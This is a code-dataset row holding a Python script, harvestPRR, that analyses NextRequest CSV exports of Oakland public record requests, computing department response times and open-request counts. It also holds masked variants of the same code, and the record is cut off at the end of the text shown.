code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
'''harvestPRR: analyze Public Record Requests from CSV data provided by NextRequest
Created 27 Aug 20
@author: [email protected]
'''
from collections import defaultdict
import csv
import datetime
import json
import random
import re
import requests
import sys
import time
import urllib
import re
PRRDateFmt = '%Y-%m-%dT%H:%M:%S'
PRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f'
DateTypes = {'date_received': 'recdDate',
'date_created': 'createDate',
'status_updated': 'statusUpDate'}
def freqHist3(tbl):
'''python3 version
ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order
'''
from functools import cmp_to_key
def cmpd1(a,b):
"decreasing order of frequencies"
return b[1] - a[1]
flist = list(tbl.items()) #python3
flist.sort(key=cmp_to_key(cmpd1))
return flist
AllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date', 'Point of Contact', 'Request Date',
'Status', 'URL', 'Visibility', 'Closed Date', 'Closure Reasons',
'Departments', 'Format Received', 'Staff Time (hrs:minutes)',
'Staff Time (minutes)', 'Tags', 'Embargo Ends On Date',
'Staff Cost', 'Date First Contact', 'First Contact Event',
'Compliance', 'Anticipated Fulfillment Date', 'Expiration Date',
'Requester City', 'Requester State', 'Requester Zipcode', 'Requester Company']
DeptNorm = {"Admin: Planning, Building & Neighborhood Preserv": "Admin: Building Inspection",
"Budget and Fiscal": "Budget and Revenue - Revenue Division",
"City Attorney Administration Unit": "City Attorney",
"City Auditor Unit": "City Auditor",
"City Clerk Unit": "City Clerk",
"Oakland Police Department": "Police Department",
"Contracts and Compliance": "Contracts Compliance",
"Transportation Services - Administration": "Department of Transportation",
"Fire": "Fire Department",
"Human Resources Management": "Human Resources",
"Information Technology (IT)": "Information Technology",
"Public Works Agency": "Public Works"}
CSVDTFormat = '%m/%d/%Y %H:%M:%S %p'
# 07/01/2020 09:54:53 AM
def bldIndexTblCSV(inf,startDate=None):
'''return prrIDTbl, deptTbl
'''
prrTbl = {}
deptTbl = defaultdict(list) # keep list of all prrIDs
statusTbl = defaultdict(int)
ncloseDate = 0
nolder = 0
nmultDept = 0
deptSepChar = b'\xef\xbf\xbd' # only used in Finance
reader = csv.DictReader(open(inf,encoding = "utf8",errors='replace'))
for i,entry in enumerate(reader):
prr = {}
prrID = entry['Id']
createDateStr = entry['Created At'].strip()
prr['createDate'] = datetime.datetime.strptime(createDateStr,CSVDTFormat) if createDateStr != '' else None
if prr['createDate'] == None or \
(startDate != None and prr['createDate'] < startDate):
nolder += 1
continue
deptStr = entry['Departments'].strip()
# NB: multiple department separated by semi-colon
if deptStr.find(';') == -1:
deptList = [deptStr]
else:
nmultDept += 1
deptList = [dept.strip() for dept in deptStr.split(';')]
deptList2 = []
for dept in deptList:
ndept = DeptNorm[dept] if dept in DeptNorm else dept
if ndept != '':
deptList2.append(ndept)
deptTbl[ndept].append(prrID)
prr['dept'] = deptList2
closeDateStr = entry['Closed Date'].strip()
prr['closeDate'] = datetime.datetime.strptime(closeDateStr,CSVDTFormat) if closeDateStr != '' else None
prr['status'] = entry['Status'].strip()
prr['text'] = entry['Request Text'].strip()
prr['closeReason'] = entry['Closure Reasons'].strip()
prr['URL'] = entry['URL'].strip()
statusTbl[ prr['status'] ] += 1
if prr['closeDate'] != None:
ncloseDate += 1
prrTbl[prrID] = prr
print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % \
(len(prrTbl),len(deptTbl),nmultDept,ncloseDate))
if startDate != None:
print('bldIndexTblCSV: NOld dropped=%d' % (nolder))
# freqList = freqHist3(deptTbl)
# print('Dept,Freq')
# for dept,freq in freqList:
# print('"%s",%d' % (dept,freq))
freqList = freqHist3(statusTbl)
print('Status,Freq')
for status,freq in freqList:
print('"%s",%d' % (status,freq))
return (prrTbl, deptTbl)
def compHistAvg(hist):
'''compute first moment
ASSUME hist: value -> freq
'''
sum = n = 0
for v in hist.keys():
n += hist[v]
sum += v * hist[v]
return n,float(sum) / n
def compMedian(hist):
'''compute MEDIAN value
ASSUME hist: value -> freq
'''
# only singletons thwart the search for half-way point
if len(hist) == 1:
return hist[0]
sum = n = 0
vn = {}
for v in sorted(hist.keys()):
n += hist[v]
sum += v * hist[v]
vn[v] = n
half = float(n/2.)
for v in sorted(hist.keys()):
if vn[v] > half:
return v
def anlyzCreateDates(prrIDTbl,outf):
'''distribution of create dates
'''
dateDist = defaultdict(int)
nmissdate = 0
for prrID,prr in prrIDTbl.items():
# 180204
# for dtype in DateTypes.values():
# if dtype in prr:
# if cdateFnd == None:
# cdateFnd = prr[dtype]
# else:
# if prr[dtype] != cdateFnd:
# cdateFnd = min([cdateFnd,prr[dtype]])
cdateFnd = prr['createDate']
if cdateFnd== None:
nmissdate += 1
continue
mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)
dateDist[mkey] += 1
print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl),nmissdate))
allMon = list(dateDist.keys())
allMon.sort()
outs = open(outf,'w')
outs.write('Month,Freq\n')
for mkey in allMon:
outs.write('%s,%d\n' % (mkey,dateDist[mkey]))
outs.close()
def normDeptName(dept):
return re.sub('\W','_',dept.upper())
def anlyzClearDates(prrIDTbl,deptTbl,startDate,outdir,minDeptFreq=10):
'''Compute average (over previous 90 days) number of days to respond to request
Number requests open at month start
'''
allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq ]
allDept.sort()
nonOPDresp = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq
nonOPDopen = defaultdict(int) # month -> freq
print('\n# Dept,NOld,NMissRecd,NMissClose')
missCloseDetails = defaultdict(lambda: defaultdict(list)) # dept -> recd -> [prrID]
for dept in allDept:
responseMon = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq
openReqMon = defaultdict(int) # month -> freq
nmissRecd = 0
nmissClose = 0
nolder = 0
for prrID in deptTbl[dept]:
prr = prrIDTbl[prrID]
# 180228
# recdDateTime = prr['recdDate']
recdDateTime = prr['createDate']
if recdDateTime==None:
nmissRecd += 1
continue
if recdDateTime < startDate:
nolder += 1
continue
try:
recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month)
except Exception as e:
print('huh')
if prr['status'] == 'Closed':
# 180228
# closeDate = prr['statusUpDate']
closeDate = prr['closeDate']
if closeDate==None:
nmissClose += 1
missCloseDetails[dept][recdMonKey].append(prrID)
continue
respDelay = closeDate - recdDateTime
delayDays = respDelay.days
responseMon[recdMonKey][delayDays] += 1
# NB: was 'Oakland Police Deparment' in 180204
if dept != 'Police Department':
nonOPDresp[recdMonKey][delayDays] += 1
else:
openReqMon[recdMonKey] += 1
# NB: was 'Oakland Police Deparment' in 180204
if dept != 'Police Department':
nonOPDopen[recdMonKey] += 1
print('"%s",%d,%d,%d' % (dept,nolder,nmissRecd,nmissClose))
allMonth = list(responseMon.keys())
allMonth.sort()
normDept = normDeptName(dept)
outf = outdir + normDept + '-RT.csv'
outs = open(outf,'w')
outs.write('Month,NClose,NOpen,Avg,Median\n')
for recdMonKey in allMonth:
nreq,avgDelay = compHistAvg(responseMon[recdMonKey])
medianDelay = compMedian(responseMon[recdMonKey])
outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,openReqMon[recdMonKey],avgDelay,medianDelay))
outs.close()
# outf = outdir + normDept + '-nopen.csv'
# outs = open(outf,'w')
# outs.write('Month,NOpen\n')
# for recdMonKey in allMonth:
# outs.write('%s,%d\n' % (recdMonKey,openReqMon[recdMonKey]))
# outs.close()
allMonth = list(nonOPDresp.keys())
allMonth.sort()
outf = outdir + 'NonOPD-RT.csv'
outs = open(outf,'w')
outs.write('Month,N,NOPen,Avg,Median\n')
for recdMonKey in allMonth:
nreq,avgDelay = compHistAvg(nonOPDresp[recdMonKey])
medianDelay = compMedian(nonOPDresp[recdMonKey])
outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,nonOPDopen[recdMonKey],avgDelay,medianDelay))
outs.close()
# outf = outdir + 'NonOPD-NOpen.csv'
# outs = open(outf,'w')
# outs.write('Month,NOpen\n')
# for recdMonKey in allMonth:
# outs.write('%s,%d\n' % (recdMonKey,nonOPDopen[recdMonKey]))
# outs.close()
outf = outdir + 'missClose.csv'
outs = open(outf,'w')
# missCloseDetails: dept -> recd -> freq
allDateSet = set()
for dept in missCloseDetails.keys():
allDateSet.update(missCloseDetails[dept].keys())
allDates = sorted(list(allDateSet))
hdr = 'Dept'
for date in allDates:
hdr += ',%s' % (date,)
outs.write(hdr+'\n')
for dept in sorted(missCloseDetails.keys()):
line = dept
for date in allDates:
if date in missCloseDetails[dept]:
line += ',%d' % (len(missCloseDetails[dept][date]),)
else:
line += ', '
outs.write(line+'\n')
outs.close()
def rptDeptFreq(prrTbl, deptTbl,startDate,outf):
# freq = defaultdict(int)
outs = open(outf,'w')
outs.write('Dept,Freq\n')
for dept in sorted(deptTbl.keys()):
nrecent = 0
for prrIdx in deptTbl[dept]:
prr = prrTbl[prrIdx]
if prr['createDate'] >= startDate:
nrecent += 1
outs.write('%s,%d\n' % (dept,nrecent))
outs.close()
def rptOpenPRR(prrTbl,outf):
daysOpen = defaultdict(lambda: defaultdict(list)) # ndays -> OPD/non -> [prrID]
runDate = datetime.datetime.today()
for prrID in prrTbl.keys():
prr = prrTbl[prrID]
opdP = 'Police Department' in prr['dept']
if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr['status'] == 'Due soon':
recdDateTime = prr['createDate']
openPeriod = runDate - recdDateTime
openDays = openPeriod.days
# NB: capture integer dividend
openYears = openDays // 365
if openYears == 0:
dkey = openDays
else:
dkey = 1000 + openYears
daysOpen[opdP][dkey].append(prrID)
outs = open(outf,'w')
outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\n')
allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys()))
allNDay = sorted(list(allNDaySet))
for nday in allNDay:
if nday > 365:
lbl = '> %d year' % (nday-1000)
else:
lbl = '%d' % nday
opdList = daysOpen[1][nday] if nday in daysOpen[1] else []
nonList = daysOpen[0][nday] if nday in daysOpen[0] else []
outs.write('%s,%d,%d,"%s","%s"\n' % (lbl,len(opdList),len(nonList), opdList,nonList))
outs.close()
def getWebPages(prrTbl,outf):
outs = open(outf,'w')
outs.write('PRRID,OPD,Text\n')
nempty = 0
npdf = 0
for i,prrID in enumerate(sorted(prrTbl.keys())):
prr = prrTbl[prrID]
if prr['URL'] == '':
nempty += 1
continue
opdP = 'Police Department' in prr['dept']
url = prr['URL']
response = urllib.request.urlopen(url)
webContentBytes = response.read()
webContent = webContentBytes.decode("utf-8")
if webContent.find('pdf') != -1:
print('here')
npdf += 1
else:
continue
if i % 100 == 0:
print(i,npdf,nempty)
# outs.write('%s,%d,"%s"\n' % (prrID,opdP,prr['text']))
outs.close()
print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl),nempty))
def loadPRRQuery(inf):
reader = csv.DictReader(open(inf))
prrIDList = []
for i,entry in enumerate(reader):
# Exhibit,PRRId
prrIDList.append(entry['PRRId'].strip())
return prrIDList
def rptQry(qryList,outf):
outs = open(outf,'w')
outs.write('PRID,CreateDate,DaysOpen,Status\n')
runDate = datetime.datetime.today()
for prrID in qryList:
prr = prr20Recent[prrID]
recdDateTime = prr['createDate']
openPeriod = runDate - recdDateTime
openDays = openPeriod.days
outs.write('%s,%s,%d,%s\n' % (prrID,prr['createDate'].date(),openDays,prr['status']))
outs.close()
if __name__ == '__main__':
dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'
startDate = datetime.datetime(2017,1,1)
csvFile = dataDir + 'requests-2020-07-01-sdoran.csv'
# prr20, deptTbl = bldIndexTblCSV(csvFile)
prr20Recent, deptTbl = bldIndexTblCSV(csvFile,startDate)
openPRRFile = dataDir + 'openPRR_200831.csv'
rptOpenPRR(prr20Recent,openPRRFile)
deptFreqFile = dataDir + 'deptFreq2.csv'
rptDeptFreq(prr20Recent, deptTbl,startDate,deptFreqFile)
createDateFile = dataDir + 'createDate_200831.csv'
anlyzCreateDates(prr20Recent,createDateFile)
clearDateDir = dataDir + 'deptClear_200831/'
anlyzClearDates(prr20Recent,deptTbl,startDate,clearDateDir)
openOPDFile = dataDir + 'openOPD_200831.csv'
rptOpenPRR(prr20Recent,openOPDFile)
|
normal
|
{
"blob_id": "b3758e42b52bb50d806832c6a3a76ae0537266de",
"index": 8043,
"step-1": "<mask token>\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n return b[1] - a[1]\n flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n return flist\n\n\n<mask token>\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList = [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first moment\n\tASSUME hist: value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n nolder += 1\n continue\n try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % (len(missCloseDetails[dept][date]),)\n else:\n line += ', '\n outs.write(line + '\\n')\n outs.close()\n\n\n<mask token>\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n return b[1] - a[1]\n flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n return flist\n\n\n<mask token>\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList = [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first moment\n\tASSUME hist: value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n nolder += 1\n continue\n try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % (len(missCloseDetails[dept][date]),)\n else:\n line += ', '\n outs.write(line + '\\n')\n outs.close()\n\n\ndef rptDeptFreq(prrTbl, deptTbl, startDate, outf):\n outs = open(outf, 'w')\n outs.write('Dept,Freq\\n')\n for dept in sorted(deptTbl.keys()):\n nrecent = 0\n for prrIdx in deptTbl[dept]:\n prr = prrTbl[prrIdx]\n if prr['createDate'] >= startDate:\n nrecent += 1\n outs.write('%s,%d\\n' % (dept, nrecent))\n outs.close()\n\n\n<mask token>\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\n<mask token>\n",
